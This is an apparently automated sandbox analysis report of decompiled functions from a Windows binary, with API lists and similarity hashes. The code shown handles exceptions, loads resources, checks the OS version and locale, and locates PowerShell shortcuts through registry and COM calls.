C-Code - Quality: 100%
E01259BEC(struct _EXCEPTION_POINTERS* _a4) {

	SetUnhandledExceptionFilter(0);
	UnhandledExceptionFilter(_a4);
	return TerminateProcess(GetCurrentProcess(), 0xc0000409);
}

APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,01259D22,01251024), ref: 01259BF3
• UnhandledExceptionFilter.KERNEL32(01259D22,?,01259D22,01251024), ref: 01259BFC
• GetCurrentProcess.KERNEL32(C0000409,?,01259D22,01251024), ref: 01259C07
• TerminateProcess.KERNEL32(00000000,?,01259D22,01251024), ref: 01259C0E
Memory Dump Source
• Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
• Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp
• Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
• String ID:
• API String ID: 3231755760-0
• Opcode ID: f9405b43ed201960364c9f97bec4db27cc2faaa36b6fb9718ad4b6d860c9445b
• Instruction ID: fe5f3c43a2b613ed7959bf385d609e45cc6148a932cabd28f55a1295e0aa692b
• Opcode Fuzzy Hash: f9405b43ed201960364c9f97bec4db27cc2faaa36b6fb9718ad4b6d860c9445b
• Instruction Fuzzy Hash: A7D0C932200584BBDF202BF1F90CA893F28EFC8212F048000FB19C60A5CA3264218B61
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0125D547(struct HINSTANCE__* __ecx) {
	struct HRSRC__* _t1;
	struct HINSTANCE__* _t4;

	_t4 = __ecx;
	_t1 = FindResourceExW(__ecx, "MUI", 1, 0);
	if(_t1 != 0) {
		return LoadResource(_t4, _t1);
	} else {
		return _t1;
	}
}





                                                                                                                                                                                                                              0x0125d54e
                                                                                                                                                                                                                              0x0125d556
                                                                                                                                                                                                                              0x0125d55e
                                                                                                                                                                                                                              0x0125d56b
                                                                                                                                                                                                                              0x0125d561
                                                                                                                                                                                                                              0x0125d561
                                                                                                                                                                                                                              0x0125d561

APIs
• FindResourceExW.KERNEL32(00000000,MUI,00000001,00000000,00000000,0125D603,00000000,00000000,0125D6B8,00000000,00000000,?,?,00000000,?), ref: 0125D556
• LoadResource.KERNEL32(00000000,00000000), ref: 0125D564
Strings
Memory Dump Source
• Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
• Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp
• Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp
Similarity
• API ID: Resource$FindLoad
• String ID: MUI
• API String ID: 2619053042-1339004836
• Opcode ID: 4bd29f7bb1dbd35ec4cb55ce869fdeed71f8bb746fa94edecfbcb003082fa70d
• Instruction ID: 4d742851aa2c1d7c52249ac0b62a9dd18f55a2102ce216f1df25928ac8094b3f
• Opcode Fuzzy Hash: 4bd29f7bb1dbd35ec4cb55ce869fdeed71f8bb746fa94edecfbcb003082fa70d
• Instruction Fuzzy Hash: E7D01231345171B6EB71261A7C0DFD71A18DBC1BB5F018146FD05D6195DBA06D8282E4
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 72%
			E0125D220() {
				signed int _v8;
				short _v16;
				struct _OSVERSIONINFOW _v292;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t23;
				void* _t25;
				intOrPtr _t26;
				void* _t29;
				void* _t30;
				void* _t34;
				void* _t37;
				void* _t38;
				int _t40;
				signed int _t42;

				_t16 =  *0x1260358; // 0xc21f7063
				_v8 = _t16 ^ _t42;
				_t40 =  *0x12608f4; // 0x0
				if(_t40 == 0) {
					memset( &_v292, _t40, 0x11c);
					_v292.dwOSVersionInfoSize = 0x11c;
					_t23 = GetVersionExW( &_v292);
					_t38 = _t38;
					if(_t23 == 0) {
						_v292.dwOSVersionInfoSize = 0x114;
						GetVersionExW( &_v292);
					}
					 *0x12608f4 = _t40;
					_t25 = _v292.dwPlatformId - 1;
					if(_t25 == 0) {
						L20:
						if(_v292.dwMajorVersion == 4) {
							_t26 = _v292.dwMinorVersion;
							if(_t26 == 0 || _t26 == 0xa || _t26 == 0x5a) {
								_t40 = 1;
								goto L25;
							}
						}
					} else {
						if(_t25 == 1) {
							if(_v292.dwMajorVersion != 5) {
								if(_v292.dwMajorVersion > 4) {
									_push(0x20);
									goto L17;
								} else {
									_t40 = 2;
									 *0x12608f4 = _t40;
									goto L20;
								}
							} else {
								_t29 = _v292.dwMinorVersion - _t40;
								if(_t29 == 0) {
									_push(4);
									goto L17;
								} else {
									_t30 = _t29 - 1;
									if(_t30 == 0) {
										if(_v16 >= 2) {
											_push(8);
											goto L14;
										}
										goto L15;
									} else {
										if(_t30 == 1) {
											if(_v16 >= 1) {
												_push(0x10);
												L14:
												_pop(_t40);
											}
											L15:
											_t40 = _t40 | 0x00000004;
										} else {
											_push(0x14);
											L17:
											_pop(_t40);
										}
									}
								}
								L25:
								 *0x12608f4 = _t40;
							}
						}
					}
				}
				return E01259A40(_t40, _t34, _v8 ^ _t42, _t37, _t38, _t40);
			}

                                                                                                                                                                                                                              0x0125d311
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d311
                                                                                                                                                                                                                              0x0125d303
                                                                                                                                                                                                                              0x0125d29b
                                                                                                                                                                                                                              0x0125d29e
                                                                                                                                                                                                                              0x0125d2a7
                                                                                                                                                                                                                              0x0125d2e7
                                                                                                                                                                                                                              0x0125d329
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d2e9
                                                                                                                                                                                                                              0x0125d2eb
                                                                                                                                                                                                                              0x0125d2ec
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d2ec
                                                                                                                                                                                                                              0x0125d2a9
                                                                                                                                                                                                                              0x0125d2af
                                                                                                                                                                                                                              0x0125d2b1
                                                                                                                                                                                                                              0x0125d2db
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d2b3
                                                                                                                                                                                                                              0x0125d2b3
                                                                                                                                                                                                                              0x0125d2b6
                                                                                                                                                                                                                              0x0125d2d1
                                                                                                                                                                                                                              0x0125d2d3
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d2d3
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d2b8
                                                                                                                                                                                                                              0x0125d2bb
                                                                                                                                                                                                                              0x0125d2c6
                                                                                                                                                                                                                              0x0125d2c8
                                                                                                                                                                                                                              0x0125d2d5
                                                                                                                                                                                                                              0x0125d2d5
                                                                                                                                                                                                                              0x0125d2d5
                                                                                                                                                                                                                              0x0125d2d6
                                                                                                                                                                                                                              0x0125d2d6
                                                                                                                                                                                                                              0x0125d2bd
                                                                                                                                                                                                                              0x0125d2bd
                                                                                                                                                                                                                              0x0125d2dd
                                                                                                                                                                                                                              0x0125d2dd
                                                                                                                                                                                                                              0x0125d2dd
                                                                                                                                                                                                                              0x0125d2bb
                                                                                                                                                                                                                              0x0125d2b6
                                                                                                                                                                                                                              0x0125d312
                                                                                                                                                                                                                              0x0125d312
                                                                                                                                                                                                                              0x0125d312
                                                                                                                                                                                                                              0x0125d2a7
                                                                                                                                                                                                                              0x0125d29e
                                                                                                                                                                                                                              0x0125d299
                                                                                                                                                                                                                              0x0125d328

APIs
• memset.MSVCRT ref: 0125D253
• GetVersionExW.KERNEL32(?,?,00000000), ref: 0125D268
• GetVersionExW.KERNEL32(?,00000000), ref: 0125D284
Memory Dump Source
• Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
• Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp
• Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp
Similarity
• API ID: Version$memset
• String ID:
• API String ID: 3607446104-0
• Opcode ID: 62daaf4787997ed6d1aa850e17b7a84fb800dccebe6b5d0086e02332271df8e4
• Instruction ID: c1961fe3877945aeea4d6fe2391b587f3cd054791a9a776ca5768f13e5096bbe
• Opcode Fuzzy Hash: 62daaf4787997ed6d1aa850e17b7a84fb800dccebe6b5d0086e02332271df8e4
• Instruction Fuzzy Hash: C231F931D6022EA7DBB59F9C998ABE977B8A705760F044156DF04E2142C670CA818FD5
Uniqueness Score: -1.00%

C-Code - Quality: 75%
			E0125D111() {
				signed int _v8;
				long _v72;
				void* __esi;
				signed int _t5;
				signed int _t12;
				void* _t15;
				void* _t18;
				void* _t19;
				signed int _t20; // used below but omitted from the decompiler's declarations
				signed int _t21;

				_t5 =  *0x1260358; // 0xc21f7063 (stack cookie seed)
				_v8 = _t5 ^ _t21;
				_t20 = 0xc04;
				// LCID 0x404 (zh-TW), LOCALE_SABBREVLANGNAME (8): compare the first 3 chars of the abbreviated language name
				if(GetLocaleInfoW(0x404, 8,  &_v72, 0x20) != 0) {
					_t12 = wcsncmp( &_v72, 0x1253f1c, 3);
					asm("sbb eax, eax");
					_t20 = 0xc04 + ( ~_t12 & 0xfffff800);
				}
				return E01259A40(_t20, _t15, _v8 ^ _t21, _t18, _t19, _t20);
			}

APIs
• GetLocaleInfoW.KERNEL32(00000404,00000008,?,00000020,00000000), ref: 0125D136
• wcsncmp.MSVCRT(?,01253F1C,00000003), ref: 0125D14B
Memory Dump Source
• Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
• Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp
• Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp
Similarity
• API ID: InfoLocalewcsncmp
• String ID:
• API String ID: 4128031126-0
• Opcode ID: 39cf62be32745f7081bd1c31d98342a5c10e4027066cf4d375121827a7f0e0a6
• Instruction ID: 719d270e98a0932d5a477beefcd50c001a034f49cfd066ee6f5719b87e5fcbe7
• Opcode Fuzzy Hash: 39cf62be32745f7081bd1c31d98342a5c10e4027066cf4d375121827a7f0e0a6
• Instruction Fuzzy Hash: 43F0E9B2E5020DA7EB50DA749C46F6E77EC9700714F400124AE04E72C1EA30AD05C695
Uniqueness Score: -1.00%

                                                                                                                                                                                                                              C-Code - Quality: 56%
                                                                                                                                                                                                                              			E0125BC92(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                              				void* _t100;
                                                                                                                                                                                                                              				void* _t101;
                                                                                                                                                                                                                              				void* _t105;
                                                                                                                                                                                                                              				void* _t110;
                                                                                                                                                                                                                              				void* _t112;
                                                                                                                                                                                                                              				void* _t113;
                                                                                                                                                                                                                              				void* _t115;
                                                                                                                                                                                                                              				void* _t119;
                                                                                                                                                                                                                              				void* _t120;
                                                                                                                                                                                                                              				void* _t127;
                                                                                                                                                                                                                              				void* _t130;
                                                                                                                                                                                                                              				void* _t131;
                                                                                                                                                                                                                              				void* _t143;
                                                                                                                                                                                                                              				void* _t151;
                                                                                                                                                                                                                              				void* _t154;
                                                                                                                                                                                                                              				void* _t156;
                                                                                                                                                                                                                              				void* _t164;
                                                                                                                                                                                                                              				void* _t166;
                                                                                                                                                                                                                              				void* _t167;
                                                                                                                                                                                                                              				void* _t168;
                                                                                                                                                                                                                              				void* _t171;
                                                                                                                                                                                                                              				void* _t172;
                                                                                                                                                                                                                              				void* _t173;
                                                                                                                                                                                                                              				void* _t174;
                                                                                                                                                                                                                              				void* _t176;
                                                                                                                                                                                                                              				char* _t177;
                                                                                                                                                                                                                              				char* _t178;
                                                                                                                                                                                                                              				void* _t191;
                                                                                                                                                                                                                              				void* _t193;
                                                                                                                                                                                                                              				intOrPtr* _t200;
                                                                                                                                                                                                                              				void* _t202;
                                                                                                                                                                                                                              				void* _t203;
                                                                                                                                                                                                                              				void* _t209;
                                                                                                                                                                                                                              				void* _t210;
                                                                                                                                                                                                                              				void* _t227;
                                                                                                                                                                                                                              				void* _t237;
                                                                                                                                                                                                                              				signed int _t253;
                                                                                                                                                                                                                              				void* _t270;
                                                                                                                                                                                                                              				void* _t271;
                                                                                                                                                                                                                              
                                                                                                                                                                                                                              				_t179 = __ecx;
                                                                                                                                                                                                                              				_push(0x30);
                                                                                                                                                                                                                              				E0125A5F0(E0125A7F0, __ebx, __edi, __esi);
                                                                                                                                                                                                                              				 *((intOrPtr*)(_t270 - 0x3c)) = __ecx;
                                                                                                                                                                                                                              				_t257 =  *(__edx + 0xc);
                                                                                                                                                                                                                              				_t176 = 0;
                                                                                                                                                                                                                              				 *(_t270 - 0x28) = 0;
                                                                                                                                                                                                                              				_t259 = 0;
                                                                                                                                                                                                                              				if( *(__edx + 0xc) == 0 || ( *(__edx + 0x2c) & 0x00000800) == 0) {
                                                                                                                                                                                                                              					 *(_t270 - 0x24) = _t176;
                                                                                                                                                                                                                              					_t100 = E0125C81E(_t179);
                                                                                                                                                                                                                              					_t177 = L"ConsoleHostShortcutTargetX86";
                                                                                                                                                                                                                              					if(_t100 == 0) {
                                                                                                                                                                                                                              						_t177 = L"ConsoleHostShortcutTarget";
                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                              					_t101 = _t270 - 0x24;
                                                                                                                                                                                                                              					__imp__RegGetValueW(0x80000002, L"SOFTWARE\\Microsoft\\PowerShell\\3", _t177, 0x10000006, 0, 0, _t101);
                                                                                                                                                                                                                              					_t277 = _t101;
                                                                                                                                                                                                                              					if(_t101 != 0) {
                                                                                                                                                                                                                              						_t176 = 0;
                                                                                                                                                                                                                              						__eflags = 0;
                                                                                                                                                                                                                              						goto L20;
                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                              						_t253 = 2;
                                                                                                                                                                                                                              						_t164 = E0125972E( ~(0 | _t277 > 0x00000000) | (( *(_t270 - 0x24) >> 0x00000001) + 0x00000001) * _t253);
                                                                                                                                                                                                                              						_t225 =  *(_t270 - 0x24) + 2;
                                                                                                                                                                                                                              						 *(_t270 - 0x28) = _t164;
                                                                                                                                                                                                                              						memset(_t164, 0,  *(_t270 - 0x24) + 2);
                                                                                                                                                                                                                              						_t271 = _t271 + 0x10;
                                                                                                                                                                                                                              						_t166 = _t270 - 0x24;
                                                                                                                                                                                                                              						__imp__RegGetValueW(0x80000002, L"SOFTWARE\\Microsoft\\PowerShell\\3", _t177, 0x10000006, 0,  *(_t270 - 0x28), _t166);
                                                                                                                                                                                                                              						if(_t166 != 0) {
                                                                                                                                                                                                                              							_t167 = E0125C81E(_t225);
                                                                                                                                                                                                                              							__eflags = _t167;
                                                                                                                                                                                                                              							if(_t167 == 0) {
                                                                                                                                                                                                                              								_t178 = L"%AppData%\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell\\Windows PowerShell.lnk";
                                                                                                                                                                                                                              								_t168 = E0125C782(_t178);
                                                                                                                                                                                                                              								__eflags = _t168;
                                                                                                                                                                                                                              								if(_t168 != 0) {
                                                                                                                                                                                                                              									goto L15;
                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                              									_t178 = L"%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\Windows PowerShell.lnk";
                                                                                                                                                                                                                              									_t171 = E0125C782(_t178);
                                                                                                                                                                                                                              									__eflags = _t171;
                                                                                                                                                                                                                              									if(_t171 != 0) {
                                                                                                                                                                                                                              										goto L15;
                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                              										_t178 = L"%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk";
                                                                                                                                                                                                                              										goto L14;
                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                              								_t178 = L"%AppData%\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell\\Windows PowerShell(x86).lnk";
                                                                                                                                                                                                                              								_t173 = E0125C782(_t178);
                                                                                                                                                                                                                              								__eflags = _t173;
                                                                                                                                                                                                                              								if(_t173 != 0) {
                                                                                                                                                                                                                              									L15:
                                                                                                                                                                                                                              									_t257 = _t178;
                                                                                                                                                                                                                              									goto L16;
                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                              									_t178 = L"%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Windows PowerShell (x86).lnk";
                                                                                                                                                                                                                              									_t174 = E0125C782(_t178);
                                                                                                                                                                                                                              									__eflags = _t174;
                                                                                                                                                                                                                              									if(_t174 != 0) {
                                                                                                                                                                                                                              										goto L15;
                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                              										_t178 = L"%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell (x86).lnk";
                                                                                                                                                                                                                              										L14:
                                                                                                                                                                                                                              										_t172 = E0125C782(_t178);
                                                                                                                                                                                                                              										__eflags = _t172;
                                                                                                                                                                                                                              										if(_t172 != 0) {
                                                                                                                                                                                                                              											goto L15;
                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                              							}
						} else {
							_t257 =  *(_t270 - 0x28);
							L16:
							_t259 = 1;
						}
						_t176 = 0;
						_t227 = 0x6d;
						 *(_t270 - 0x14) = 0;
						if(E0125CDCC(_t227, _t270 - 0x14) >= 0) {
							SetConsoleTitleW( *(_t270 - 0x14));
							free( *(_t270 - 0x14));
							L20:
							E0125CE85(_t257, 0x7ffffffe, _t270 - 0x14);
							E0125CE50(0x12606e8,  *(_t270 - 0x14) + 1, _t257);
							if(_t259 == 0) {
								goto L21;
							}
							goto L22;
						}
					}
				} else {
					L21:
					E0125CE85(_t257, 0x7ffffffe, _t270 - 0x14);
					E0125CE50(0x12606e8,  *(_t270 - 0x14) + 1, _t257);
					L22:
					 *(_t270 - 0x34) = _t176;
					 *(_t270 - 4) = _t176;
					 *(_t270 - 0x2c) = _t176;
					_t105 = _t270 - 0x2c;
					 *(_t270 - 4) = 1;
					__imp__CoCreateInstance(0x12531b0, _t176, 1, 0x125334c, _t105);
					_t259 = _t105;
					if(_t105 >= 0) {
						_t110 =  *(_t270 - 0x2c);
						 *0x1261204(_t110, 0x12531e0, _t270 - 0x34);
						_t112 =  *( *_t110)();
						_t259 = _t112;
						if(_t112 >= 0) {
							_t113 =  *(_t270 - 0x34);
							_t237 = 2;
							 *0x1261204(_t113, 0x12606e8, _t237);
							_t115 =  *((intOrPtr*)( *((intOrPtr*)( *_t113 + 0x14))))();
							 *(_t270 - 0x38) = _t176;
							if(_t115 < 0) {
								E0125CE85(L"%windir%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", 0x7ffffffe, _t270 - 0x14);
								E0125CE50(0x12606e8,  *(_t270 - 0x14) + 1, L"%windir%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe");
								goto L28;
							} else {
								_t154 =  *(_t270 - 0x2c);
								 *0x1261204(_t154, 0x12606e8, 0x104, _t270 - 0x38);
								_t156 =  *((intOrPtr*)( *_t154 + 0x40))();
								_t259 = _t156;
								if(_t156 >= 0) {
									L28:
									 *(_t270 - 0x20) = _t176;
									_t119 = 2;
									 *(_t270 - 4) = _t119;
									_t120 = _t270 - 0x20;
									__imp__CoCreateInstance(0x12531d0, _t176, 3, 0x125332c, _t120);
									_t259 = _t120;
									__eflags = _t259;
									if(_t259 >= 0) {
										 *(_t270 - 0x1c) = _t176;
										 *(_t270 - 4) = 3;
										_t191 = 0x76;
										 *(_t270 - 0x18) = _t176;
										 *(_t270 - 0x14) = _t176;
										_t259 = E0125CDCC(_t191, _t270 - 0x18);
										__eflags = _t259;
										if(_t259 >= 0) {
											_t193 = 0x77;
											E0125CDCC(_t193, _t270 - 0x14);
											_push(_t270 - 0x1c);
											_push(_t193);
											_push(1);
											_push( *(_t270 - 0x38));
											_push(0x12606e8);
											_push(_t193);
											_push(_t193);
											_t259 = E0125C2E3(_t176,  *(_t270 - 0x18), _t257, _t257, _t259, __eflags);
											free( *(_t270 - 0x28));
											free( *(_t270 - 0x18));
											free( *(_t270 - 0x14));
											__eflags = _t259;
											if(_t259 >= 0) {
												_t127 =  *(_t270 - 0x20);
												 *0x1261204(_t127,  *(_t270 - 0x1c));
												_t259 =  *((intOrPtr*)( *((intOrPtr*)( *_t127 + 0x14))))();
												__eflags = _t259;
												if(_t259 >= 0) {
													_t130 = E0125C197();
													__eflags = _t130;
													if(_t130 == 0) {
														L39:
														 *(_t270 - 0x30) = _t176;
														 *(_t270 - 4) = 4;
														_t131 =  *(_t270 - 0x20);
														 *0x1261204(_t131, 0x1253c18, _t270 - 0x30);
														_t259 =  *( *_t131)();
														__eflags = _t259;
														if(_t259 >= 0) {
															_t200 =  *((intOrPtr*)(_t270 - 0x3c));
															 *0x1261204(_t200,  *(_t270 - 0x30));
															_t259 =  *((intOrPtr*)( *((intOrPtr*)( *_t200 + 0x1c))))();
														}
														E01259691(_t270 - 0x30);
													} else {
														_t202 = 0x7a;
														_t259 = E0125CDCC(_t202, _t270 - 0x18);
														__eflags = _t259;
														if(_t259 >= 0) {
															_t203 = 0x7b;
															E0125CDCC(_t203, _t270 - 0x14);
															__imp__#30(_t270 - 0x1c, _t176);
															_t257 = L"%systemroot%\\system32\\windowspowershell\\v1.0\\powershell_ise.exe";
															_push(_t270 - 0x1c);
															_push(_t203);
															_push(1);
															_push(_t176);
															_push(_t257);
															_push(_t203);
															_push(_t203);
															_t259 = E0125C2E3(_t176,  *(_t270 - 0x18), _t257, _t257, _t259, __eflags);
															free( *(_t270 - 0x18));
															free( *(_t270 - 0x14));
															__eflags = _t259;
															if(_t259 >= 0) {
																_t143 =  *(_t270 - 0x20);
																 *0x1261204(_t143,  *(_t270 - 0x1c));
																_t259 =  *((intOrPtr*)( *((intOrPtr*)( *_t143 + 0x14))))();
																__eflags = _t259;
																if(_t259 >= 0) {
																	_t209 = 0x65;
																	_t259 = E0125CDCC(_t209, _t270 - 0x18);
																	__eflags = _t259;
																	if(_t259 >= 0) {
																		_t210 = 0x6f;
																		E0125CDCC(_t210, _t270 - 0x14);
																		__imp__#30(_t270 - 0x1c, _t176);
																		_push(_t270 - 0x1c);
																		_push(_t210);
                                                                                                                                                                                                                              																		_push(_t176);
                                                                                                                                                                                                                              																		_push(_t176);
                                                                                                                                                                                                                              																		_push(_t257);
                                                                                                                                                                                                                              																		_push(_t210);
                                                                                                                                                                                                                              																		_push(_t210);
                                                                                                                                                                                                                              																		_t259 = E0125C2E3(_t176,  *(_t270 - 0x18), _t257, _t257, _t259, __eflags);
                                                                                                                                                                                                                              																		free( *(_t270 - 0x18));
                                                                                                                                                                                                                              																		free( *(_t270 - 0x14));
                                                                                                                                                                                                                              																		__eflags = _t259;
                                                                                                                                                                                                                              																		if(_t259 >= 0) {
                                                                                                                                                                                                                              																			_t151 =  *(_t270 - 0x20);
                                                                                                                                                                                                                              																			 *0x1261204(_t151,  *(_t270 - 0x1c));
                                                                                                                                                                                                                              																			_t259 =  *((intOrPtr*)( *((intOrPtr*)( *_t151 + 0x14))))();
                                                                                                                                                                                                                              																			__eflags = _t259;
                                                                                                                                                                                                                              																			if(_t259 >= 0) {
                                                                                                                                                                                                                              																				goto L39;
                                                                                                                                                                                                                              																			}
                                                                                                                                                                                                                              																		}
                                                                                                                                                                                                                              																	}
                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                              										E01259691(_t270 - 0x1c);
                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                              									E01259691(_t270 - 0x20);
                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                              					E01259691(_t270 - 0x2c);
                                                                                                                                                                                                                              					E01259691(_t270 - 0x34);
                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                              				return E0125A59F(_t176, _t257, _t259);
                                                                                                                                                                                                                              			}
                                                                                                                                                                                                                              0x0125be08
                                                                                                                                                                                                                              0x0125be08
                                                                                                                                                                                                                              0x0125be13
                                                                                                                                                                                                                              0x0125be24
                                                                                                                                                                                                                              0x0125be29
                                                                                                                                                                                                                              0x0125be29
                                                                                                                                                                                                                              0x0125be2c
                                                                                                                                                                                                                              0x0125be2f
                                                                                                                                                                                                                              0x0125be32
                                                                                                                                                                                                                              0x0125be35
                                                                                                                                                                                                                              0x0125be47
                                                                                                                                                                                                                              0x0125be4d
                                                                                                                                                                                                                              0x0125be51
                                                                                                                                                                                                                              0x0125be57
                                                                                                                                                                                                                              0x0125be68
                                                                                                                                                                                                                              0x0125be6e
                                                                                                                                                                                                                              0x0125be70
                                                                                                                                                                                                                              0x0125be74
                                                                                                                                                                                                                              0x0125be7a
                                                                                                                                                                                                                              0x0125be7f
                                                                                                                                                                                                                              0x0125be8e
                                                                                                                                                                                                                              0x0125be94
                                                                                                                                                                                                                              0x0125be96
                                                                                                                                                                                                                              0x0125be9b
                                                                                                                                                                                                                              0x0125bed8
                                                                                                                                                                                                                              0x0125bee9
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125be9d
                                                                                                                                                                                                                              0x0125be9d
                                                                                                                                                                                                                              0x0125beb4
                                                                                                                                                                                                                              0x0125beba
                                                                                                                                                                                                                              0x0125bebd
                                                                                                                                                                                                                              0x0125bec1
                                                                                                                                                                                                                              0x0125beee
                                                                                                                                                                                                                              0x0125beee
                                                                                                                                                                                                                              0x0125bef3
                                                                                                                                                                                                                              0x0125bef4
                                                                                                                                                                                                                              0x0125bef7
                                                                                                                                                                                                                              0x0125bf08
                                                                                                                                                                                                                              0x0125bf0e
                                                                                                                                                                                                                              0x0125bf10
                                                                                                                                                                                                                              0x0125bf12
                                                                                                                                                                                                                              0x0125bf18
                                                                                                                                                                                                                              0x0125bf1d
                                                                                                                                                                                                                              0x0125bf24
                                                                                                                                                                                                                              0x0125bf25
                                                                                                                                                                                                                              0x0125bf28
                                                                                                                                                                                                                              0x0125bf30
                                                                                                                                                                                                                              0x0125bf32
                                                                                                                                                                                                                              0x0125bf34
                                                                                                                                                                                                                              0x0125bf3f
                                                                                                                                                                                                                              0x0125bf40
                                                                                                                                                                                                                              0x0125bf4a
                                                                                                                                                                                                                              0x0125bf4b
                                                                                                                                                                                                                              0x0125bf4c
                                                                                                                                                                                                                              0x0125bf4e
                                                                                                                                                                                                                              0x0125bf51
                                                                                                                                                                                                                              0x0125bf56
                                                                                                                                                                                                                              0x0125bf57
                                                                                                                                                                                                                              0x0125bf63
                                                                                                                                                                                                                              0x0125bf65
                                                                                                                                                                                                                              0x0125bf6d
                                                                                                                                                                                                                              0x0125bf76
                                                                                                                                                                                                                              0x0125bf7f
                                                                                                                                                                                                                              0x0125bf81
                                                                                                                                                                                                                              0x0125bf87
                                                                                                                                                                                                                              0x0125bf95
                                                                                                                                                                                                                              0x0125bf9d
                                                                                                                                                                                                                              0x0125bf9f
                                                                                                                                                                                                                              0x0125bfa1
                                                                                                                                                                                                                              0x0125bfa7
                                                                                                                                                                                                                              0x0125bfac
                                                                                                                                                                                                                              0x0125bfae
                                                                                                                                                                                                                              0x0125c0ac
                                                                                                                                                                                                                              0x0125c0ac
                                                                                                                                                                                                                              0x0125c0af
                                                                                                                                                                                                                              0x0125c0b6
                                                                                                                                                                                                                              0x0125c0c4
                                                                                                                                                                                                                              0x0125c0cc
                                                                                                                                                                                                                              0x0125c0ce
                                                                                                                                                                                                                              0x0125c0d0
                                                                                                                                                                                                                              0x0125c0d2
                                                                                                                                                                                                                              0x0125c0e0
                                                                                                                                                                                                                              0x0125c0e8
                                                                                                                                                                                                                              0x0125c0e8
                                                                                                                                                                                                                              0x0125c0ed
                                                                                                                                                                                                                              0x0125bfb4
                                                                                                                                                                                                                              0x0125bfb9
                                                                                                                                                                                                                              0x0125bfbf
                                                                                                                                                                                                                              0x0125bfc1
                                                                                                                                                                                                                              0x0125bfc3
                                                                                                                                                                                                                              0x0125bfce
                                                                                                                                                                                                                              0x0125bfcf
                                                                                                                                                                                                                              0x0125bfd9
                                                                                                                                                                                                                              0x0125bfe2
                                                                                                                                                                                                                              0x0125bfe7
                                                                                                                                                                                                                              0x0125bfe8
                                                                                                                                                                                                                              0x0125bfe9
                                                                                                                                                                                                                              0x0125bfeb
                                                                                                                                                                                                                              0x0125bfec
                                                                                                                                                                                                                              0x0125bfed
                                                                                                                                                                                                                              0x0125bfee
                                                                                                                                                                                                                              0x0125bffc
                                                                                                                                                                                                                              0x0125bffe
                                                                                                                                                                                                                              0x0125c007
                                                                                                                                                                                                                              0x0125c00f
                                                                                                                                                                                                                              0x0125c011
                                                                                                                                                                                                                              0x0125c017
                                                                                                                                                                                                                              0x0125c025
                                                                                                                                                                                                                              0x0125c02d
                                                                                                                                                                                                                              0x0125c02f
                                                                                                                                                                                                                              0x0125c031
